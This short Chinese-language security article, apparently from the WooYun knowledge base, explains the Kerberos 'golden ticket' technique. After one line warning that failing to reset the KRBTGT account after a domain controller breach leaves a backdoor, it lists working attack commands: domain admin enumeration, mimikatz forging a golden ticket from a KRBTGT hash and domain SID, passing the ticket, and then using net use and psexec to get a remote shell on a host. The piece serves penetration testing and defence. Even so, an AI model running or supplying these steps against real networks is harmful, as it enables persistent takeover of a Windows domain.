域滲透的金之鑰匙
作者:mickey
如果域控被入侵,僅僅重置域管理員賬號,不重置KRBTGT賬號,等于是給黑客留了一個后門。
C:\Users\hydra>net group "domain admins" /domain
C:\Users\hydra>whoami /user
mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt
E:\>net use \\WIN-0DKN2AS0T2G\c$ E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd
責(zé)任編輯:藍(lán)雨淚
來源:
烏云知識庫
